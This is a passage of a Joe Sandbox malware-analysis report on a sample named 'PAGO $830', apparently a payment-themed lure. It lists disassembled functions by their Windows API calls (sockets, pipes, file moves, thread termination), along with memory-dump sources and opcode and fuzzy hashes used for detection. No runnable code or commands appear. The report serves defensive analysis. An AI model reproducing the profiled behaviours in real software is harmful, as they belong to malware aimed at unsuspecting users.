                                                          • _ValidateLocalCookies.LIBCMT ref: 00D92CDB
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00D92CE3
                                                          • _ValidateLocalCookies.LIBCMT ref: 00D92D71
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00D92D9C
                                                          • _ValidateLocalCookies.LIBCMT ref: 00D92DF1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 20b046800e5da0d1ef40ff49911b77083f86185fd07f32f664fb7942153e24c7
                                                          • Instruction ID: 10911c7d11ba08e46127cfffd35a80a3932bafd0c1ed49dbb88d43c2f4ebf932
                                                          • Opcode Fuzzy Hash: 20b046800e5da0d1ef40ff49911b77083f86185fd07f32f664fb7942153e24c7
                                                          • Instruction Fuzzy Hash: 65419134A00209ABCF14EF68C845AAEBBA5EF45324F188155E8196B392D771EA45CBF0
                                                          Function 00DF0FDF Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DF2F75: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DF2FA1
                                                            • Part of subcall function 00DF2F75: _wcslen.LIBCMT ref: 00DF2FC2
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00DF1039
                                                          • WSAGetLastError.WSOCK32 ref: 00DF1048
                                                          • WSAGetLastError.WSOCK32 ref: 00DF10F0
                                                          • closesocket.WSOCK32(00000000), ref: 00DF1120
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 2675159561-0
                                                          • Opcode ID: d508aef38b62be3974be069b2008eceb76c5680a028b77f6f1e4f586730ce42f
                                                          • Instruction ID: 69ccfc5319cb92f4493e405d4dd95f2960a84220b955bc542e447a2a7f5e641d
                                                          • Opcode Fuzzy Hash: d508aef38b62be3974be069b2008eceb76c5680a028b77f6f1e4f586730ce42f
                                                          • Instruction Fuzzy Hash: 3F411235600208AFDB109F25C844BB9B7A9FF44324F19C159FA05AB282CB71ED84CBF1
                                                          Function 00DDCE1E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DDDCFE: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DDCE40,?), ref: 00DDDD1B
                                                            • Part of subcall function 00DDDCFE: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DDCE40,?), ref: 00DDDD34
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00DDCE63
                                                          • MoveFileW.KERNEL32(?,?), ref: 00DDCE9D
                                                          • _wcslen.LIBCMT ref: 00DDCF23
                                                          • _wcslen.LIBCMT ref: 00DDCF39
                                                          • SHFileOperationW.SHELL32(?), ref: 00DDCF7F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 3164238972-1173974218
                                                          • Opcode ID: 3b84ad741c948b99f94eb06401c0e0462923219291358da7e2700b7dd9a7a87f
                                                          • Instruction ID: e5ba3d45d212e531ad7b234e7c47e6b88ec6012639bf28937eb2602e469d76a6
                                                          • Opcode Fuzzy Hash: 3b84ad741c948b99f94eb06401c0e0462923219291358da7e2700b7dd9a7a87f
                                                          • Instruction Fuzzy Hash: 964155729452195EDF12EBA4D981EDD77B9EF08340F1410E7E505EB241EB74A688CB70
                                                          Function 00E02D30 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E02D4F
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02D82
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02DB7
                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E02DE9
                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E02E13
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02E24
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E02E3E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: d2a8d60ec4796f58fa05174fee0facf3e9427eb586713970515ea190acf5e1fb
                                                          • Instruction ID: 29666217f39876d92e22b5112cecaa05fd0f1382b21e226e29709d119540dbbb
                                                          • Opcode Fuzzy Hash: d2a8d60ec4796f58fa05174fee0facf3e9427eb586713970515ea190acf5e1fb
                                                          • Instruction Fuzzy Hash: 4A312834644145AFDB21CF09EC88F6437E5FB8A714F2411A8F604AF2F1CB72AC859B02
                                                          Function 00DD767C Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD76BF
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD76E5
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00DD76E8
                                                          • SysAllocString.OLEAUT32(?), ref: 00DD7706
                                                          • SysFreeString.OLEAUT32(?), ref: 00DD770F
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00DD7734
                                                          • SysAllocString.OLEAUT32(?), ref: 00DD7742
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: d4a09621f39c930dfa0b0a26351640336018c312603ed4b7883702d8ce70a711
                                                          • Instruction ID: 8f00c79f7ecab1d9331802f7c7228324499a5fdb980841eb5de8114bd2bbb7ed
                                                          • Opcode Fuzzy Hash: d4a09621f39c930dfa0b0a26351640336018c312603ed4b7883702d8ce70a711
                                                          • Instruction Fuzzy Hash: 4C21B07660421ABFDB10AFA9CC88CBA73ACEB083647148566FA14DB290E670DC858770
                                                          Function 00DD7753 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD7798
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD77BE
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00DD77C1
                                                          • SysAllocString.OLEAUT32 ref: 00DD77E2
                                                          • SysFreeString.OLEAUT32 ref: 00DD77EB
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00DD7805
                                                          • SysAllocString.OLEAUT32(?), ref: 00DD7813
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: 6df03f631beda56044da8f3097260f83ca183070d1d6792ee1912b6857e44659
                                                          • Instruction ID: c1a4e7e30f0e7d73be611c2321fc75ab8170af77f19d1ffec8d1a34b684b1030
                                                          • Opcode Fuzzy Hash: 6df03f631beda56044da8f3097260f83ca183070d1d6792ee1912b6857e44659
                                                          • Instruction Fuzzy Hash: 7B21F535608205BFDB10AFA9CC88DBA77ECFB083607148566F904DB2A0E670DC85CB74
                                                          Function 00DE03F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00DE0410
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DE044C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateHandlePipe
                                                          • String ID: nul
                                                          • API String ID: 1424370930-2873401336
                                                          • Opcode ID: b83c625f614190deabc66245ba1f30d7509a98ff1c20fa768a5098e6e7fd66c6
                                                          • Instruction ID: 3755f0d3804a305e1b63ff0528a70ed449ac058066d17b3eb50a12becb3365f9
                                                          • Opcode Fuzzy Hash: b83c625f614190deabc66245ba1f30d7509a98ff1c20fa768a5098e6e7fd66c6
                                                          • Instruction Fuzzy Hash: BF216071500346AFDB20AF66DD04A997BE4FF54724F244A19FAA1E72E0D7B19880CB70
                                                          Function 00DE04C5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00DE04E4
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DE051F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateHandlePipe
                                                          • String ID: nul
                                                          • API String ID: 1424370930-2873401336
                                                          • Opcode ID: 5c450d0ca86df8db19538794c4dc673b9c3b7dc8074325e75ef85cd14e494cdc
                                                          • Instruction ID: e68535e50af7c3618b46e0165350aa3291e5c209ce525478f15ede9bf3a541c9
                                                          • Opcode Fuzzy Hash: 5c450d0ca86df8db19538794c4dc673b9c3b7dc8074325e75ef85cd14e494cdc
                                                          • Instruction Fuzzy Hash: CF216D755003469FDB20AF6AD804A9A7BE8AF55724F240B19EDE1E62D0D7B199C0CB30
                                                          Function 00DAD77F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DAD743: _free.LIBCMT ref: 00DAD76C
                                                          • _free.LIBCMT ref: 00DAD7CD
                                                            • Part of subcall function 00DA2958: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000), ref: 00DA296E
                                                            • Part of subcall function 00DA2958: GetLastError.KERNEL32(00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000,00000000), ref: 00DA2980
                                                          • _free.LIBCMT ref: 00DAD7D8
                                                          • _free.LIBCMT ref: 00DAD7E3
                                                          • _free.LIBCMT ref: 00DAD837
                                                          • _free.LIBCMT ref: 00DAD842
                                                          • _free.LIBCMT ref: 00DAD84D
                                                          • _free.LIBCMT ref: 00DAD858
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                          • Instruction ID: f11bf931fdc2f8ca25d564115bbd8467f9d1752d123bc30180a3c846aa182a7d
                                                          • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                          • Instruction Fuzzy Hash: 531184B16D0744A6D921BB71CC0BFDB77DDEF42700F400815B29FA6852DA24B6494B71
                                                          Function 00DDD978 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00DDD992
                                                          • LoadStringW.USER32(00000000), ref: 00DDD999
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DDD9AF
                                                          • LoadStringW.USER32(00000000), ref: 00DDD9B6
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DDD9FA
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00DDD9D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message
                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                          • API String ID: 4072794657-3128320259
                                                          • Opcode ID: 5d0ce85901d5625f03b207ed8d1de4fa2d75dabd1dd7d6ccf50f2fe532c09c68
                                                          • Instruction ID: 33ff459809bac00da4c0a178c6dab87278cabeefbda038be98eeb724a64f8902
                                                          • Opcode Fuzzy Hash: 5d0ce85901d5625f03b207ed8d1de4fa2d75dabd1dd7d6ccf50f2fe532c09c68
                                                          • Instruction Fuzzy Hash: A80162F69002087FEB109BA49D89EE6766CE708700F100592B75AF2081E6759EC88F74
                                                          Function 00DE0889 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00DE0899
                                                          • EnterCriticalSection.KERNEL32(00000000,?), ref: 00DE08AB
                                                          • TerminateThread.KERNEL32(00000000,000001F6), ref: 00DE08B9
                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00DE08C7
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DE08D6
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DE08E6
                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 00DE08ED
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: a6abf4aed952541a04d22af41ffa84b57f38fd7183bc14a49e6e187f56f6dbcc
                                                          • Instruction ID: a0989729ff770d32a99bdee5b563248b97182b2afdc3f6304351d3f197dc40eb
                                                          • Opcode Fuzzy Hash: a6abf4aed952541a04d22af41ffa84b57f38fd7183bc14a49e6e187f56f6dbcc
                                                          • Instruction Fuzzy Hash: 73F0E131042A13BFD7512B95ED8DBDA7B35FF04702F546221F201608B09B7594E5CFA0
                                                          Function 00DF1B87 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00DF1CE7
                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00DF1D08
                                                          • WSAGetLastError.WSOCK32 ref: 00DF1D19
                                                          • htons.WSOCK32(?,?,?,?,?), ref: 00DF1E02
                                                          • inet_ntoa.WSOCK32(?), ref: 00DF1DB3
                                                            • Part of subcall function 00DD3930: _strlen.LIBCMT ref: 00DD393A
                                                            • Part of subcall function 00DF314B: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00DEEB33), ref: 00DF3167
                                                          • _strlen.LIBCMT ref: 00DF1E5C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                          • String ID:
                                                          • API String ID: 3203458085-0
                                                          • Opcode ID: 8ada5fa28ebf9c12b08a2cfbb08fc0d705138e12e36e3816de4b5d2b9ce86291
                                                          • Instruction ID: c62ccdbca2198a65c2ee6139079d714d31d2bbe49e44240315f8d7c26b6626b2
                                                          • Opcode Fuzzy Hash: 8ada5fa28ebf9c12b08a2cfbb08fc0d705138e12e36e3816de4b5d2b9ce86291
                                                          • Instruction Fuzzy Hash: 31B1DE35204344AFC324EF24C895E2A7BA5EF84318F59C94CF55A5B2A2DB31ED46CBB1
                                                          Function 00DA0147 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __allrem.LIBCMT ref: 00DA004A
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA0066
                                                          • __allrem.LIBCMT ref: 00DA007D
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA009B
                                                          • __allrem.LIBCMT ref: 00DA00B2
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA00D0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          • Opcode ID: 7a9d308b5ab41ef35beb355f12ca968d0eebff7fabe2103bb5688a3c2d80e2a0
                                                          • Instruction ID: a4fe98d98b6778fb12736f4e218061c34e60a30868f2937e8d1916a59b603db1
                                                          • Opcode Fuzzy Hash: 7a9d308b5ab41ef35beb355f12ca968d0eebff7fabe2103bb5688a3c2d80e2a0
                                                          • Instruction Fuzzy Hash: 91811972A007069BEB209F79CC41BAA77E9EF46364F28413EF551D7281EBB0D9058774
                                                          Function 00DA618E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D98269,00D98269,?,?,?,00DA63DF,00000001,00000001,8BE85006), ref: 00DA61E8
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00DA63DF,00000001,00000001,8BE85006,?,?,?), ref: 00DA626E
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00DA6368
                                                          • __freea.LIBCMT ref: 00DA6375
                                                            • Part of subcall function 00DA37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D8FD75,?,?,00D7B63D,00000000,?,?,?,00DE106C,00E0D0D0,?,00DB242E), ref: 00DA37E2
                                                          • __freea.LIBCMT ref: 00DA637E
                                                          • __freea.LIBCMT ref: 00DA63A3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1414292761-0
                                                          • Opcode ID: 147b65b7ed150d149bf7f8862d4e8b1378f34dd75d40d89744c67a0596fb9332
                                                          • Instruction ID: b6ca2e114f8fb79110b307ed3d084efc0d754123e27cc09c3da4d27bef26ebe0
                                                          • Opcode Fuzzy Hash: 147b65b7ed150d149bf7f8862d4e8b1378f34dd75d40d89744c67a0596fb9332
                                                          • Instruction Fuzzy Hash: DA519D72600216EFEF258F64CC41EBF76BAEB46750B1D4628F905DA191EB34EC45C6B0
                                                          Function 00DCF696 Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                          Download Yara Rule
